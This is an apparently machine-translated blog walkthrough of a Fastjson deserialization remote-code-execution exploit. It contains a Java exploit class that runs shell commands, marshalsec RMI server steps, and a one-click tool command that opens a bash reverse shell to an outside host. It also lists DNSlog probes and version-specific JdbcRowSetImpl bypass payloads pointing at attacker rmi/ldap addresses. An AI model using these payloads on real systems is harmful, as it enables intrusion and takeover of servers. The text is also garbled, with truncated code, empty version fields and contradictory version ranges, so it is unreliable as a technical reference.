About fast JSON specific version RCE exploit exp replay

0x01 vulnerability introduction

Fastjson is an open source json parser of Alibaba company. It has superior performance and is widely used in Java projects of major manufacturers. Fast json adds deserialization whitelist after version 1.2.24. In versions before 1.2.48, attackers can successfully execute arbitrary commands by bypassing whitelist detection with specially constructed json strings.

0x02 scope of influence

Fastjson < 1.2.68

The bypassing method disclosed by Fastjson can kill all users under version 1.2.68

0x03 vulnerability recurrence

The following takes Fastjson 1.2.47 as an example, because vulhub has a ready-made environment, which is very convenient

The following is the flow diagram

Host A: host with fastjson deserialization vulnerability host C: RMI/LDAP service host B: malicious class constructed for (including commands to be executed)

Throughout the remote command execution process

1. Hackers use payload to attack host A (the payload needs to specify rmi/ldap address)

2. Host A caused A deserialization vulnerability and sent A call for rmi remote distribution to connect to host C

3. The rmi service of host C specifies to load the malicious java class of host B, so host A finally loads and executes the malicious java class of host B through the rmi service of host C

4. Host A causes malicious system command execution

0x04 reproduction process

According to the process and environment above:

Host A: (host with Fastjson vulnerability)

Host B: (malicious java class service)

Host C: rmi:// (remote method call service)

In fact, hosts B and C are different ports of the same machine

0x041 construct malicious method

The target environment is openjdk:8u102, which is not available in this version

com.sun.jndi.rmi.object.trustURLCodebase, we can simply use RMI for command execution.

First compile and upload the command execution code

Use the following payload:

touch /zydx666 is the system command, which can be modified according to your own needs

Note that the file name is Exploit.java, and the fixed format cannot be changed

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{<!-- -->
    public Exploit() throws Exception {<!-- -->
        Process p = Runtime.getRuntime().exec(new String[]{<!-- -->"bash", "-c", "touch /zydx666"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {<!-- -->


    public static void main(String[] args) throws Exception {<!-- -->

In host B, compile the Exploit.java file with the javac command to generate an Exploit.class file

javac Exploit.java

Then start an http service on host B. the middleware is optional, but it needs to be able to access the Exploit.class file. Here, use Python 3 to temporarily start an http service

python3 -m http.server --bind 8888

0x042 enable remote method call rmi service

Next, start rmi service on host C

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "" 9999


Can refer to https://github.com/mbechler/marshalsec

So far, the service is all ready

0x043 send payload

Next, send the fastjson deserialization vulnerability payload to host A (the vulnerable machine)

Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260

{<!-- -->
    "a":{<!-- -->
    "b":{<!-- -->

At this time, host A receives A POST request, triggers A deserialization vulnerability, and finally executes the contents in the Exploit.class file

I use the bounce shell command

Bounce shell succeeded:

0x05 simplified attack tool

A simplified version of the tool is provided below

Is to use https://github.com/wyzxxz/fastjson_rce_tool is a jar package written by the master, which can start the service with one click and generate the whole rmi+class file of malicious code

Step 1: just start on your own server

java -cp fastjson_tool.jar fastjson.HRMIServer 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1"

Step 2: send payload

Successful rebound shell

0x06 vulnerability detection

It is unknown whether the target uses Fastjson, but the site has the original error echo

If the site has the original error echo, the error echo can be carried out without closing curly braces. There is often the word fastjson in the error echo

for example

There is no echo. Fastjson and Jackson are blindly distinguished by DNS echo

I use the following payload tests


Finally received dnslog

The latest version 1.2.67 can still judge whether the backend uses fastjson through dnslog





To be nested inside zeo

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{<!-- -->{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{<!-- -->{"@type":"java.net.URL","val":"dnslog"}:0

0x07 multi version payload set

Affected version:



{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

Affected version:


Premise: the autoTypeSupport property can only be used if it is true. (fastjson > = 1.2.25, false by default)


{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

Affected version:


Premise: the autoTypeSupport property can only be used if it is true. (fastjson > = 1.2.25, false by default)


{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:


Premise: the autoTypeSupport property can only be used if it is true. (fastjson > = 1.2.25, false by default)


{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:


Premise: the autoTypeSupport property can only be used if it is true. (fastjson > = 1.2.25, false by default)



Affected version:



    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit", 
        "autoCommit": true

Affected version:




Affected version:


Premise: the autoTypeSupport property can only be used if it is true. (fastjson > = 1.2.25, false by default)





{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://"}}

Reference article address: https://blog.csdn.net/god_zzZ/article/details/107122487

Posted by jsucupira on Thu, 25 Nov 2021 18:41:24 -0800